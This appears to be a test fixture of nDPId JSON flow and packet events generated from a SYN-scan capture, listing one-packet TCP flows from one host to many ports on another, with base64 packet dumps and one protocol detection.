+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxQAADkGxF6sEAAIQA2GNIzSJtfdUoMYAAAAAGACCAAJuAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADoGVqqsEAAIQA2GNIzSCDvdUoMYAAAAAGACDAAkVAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsZw4AADEGsGSsEAAIQA2GNIzSKXndUoMYAAAAAGACCAAHFgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs2AwAACgGSGasEAAIQA2GNIzSCp3dUoMYAAAAAGACBAAp8gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsRBEAAC0G12GsEAAIQA2GNIzSJxPdUoMYAAAAAGACCAAJfAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs8C8AADUGI0OsEAAIQA2GNIzSBBHdUoMYAAAAAGACCAAsfgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsHTEAACwG\/0GsEAAIQA2GNIzSBBLdUoMYAAAAAGACBAAwfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsK1MAADIG6x+sEAAIQA2GNIzSH5LdUoMYAAAAAGACDAAM\/QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAsd90AADEGn5WsEAAIQA2GNIzSBI3dUoMYAAAAAGACCAAsAgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KcAACcGQMusEAAIQA2GNIzSFR3dUoMYAAAAAGACEAATcgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs36oAADkGL8isEAAIQA2GNIzSE7vdUoMYAAAAAGACCAAc1AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs554AADQGLNSsEAAIQA2GNIzSCU\/dUoMYAAAAAGACBAArQAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVqIAAC8GwtCsEAAIQA2GNIzSB+bdUoMYAAAAAGACEAAgqQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJQAADMGwN6sEAAIQA2GNIzSGW7dUoMYAAAAAGACEAAPIQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAstzAAADsGVkKsEAAIQA2GNIzSJpTdUoMYAAAAAGACEAAB+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAshrwAADsGhrasEAAIQA2GNIzSAS3dUoMYAAAAAGACEAAnYgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAscvcAADcGnnusEAAIQA2GNIzSBDbdUoMYAAAAAGACEAAkWQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6vkAADMGKnmsEAAIQA2GNIzTPpDdU4MZAAAAAGACEADp+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsHf8AADQG9nOsEAAIQA2GNIzTBPfdU4MZAAAAAGACBAAvlQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs+ZUAAC4GIN2sEAAIQA2GNIzTIADdU4MZAAAAAGACDAAMjAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIsAACoGYeesEAAIQA2GNIzTySXdU4MZAAAAAGACDABjZgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 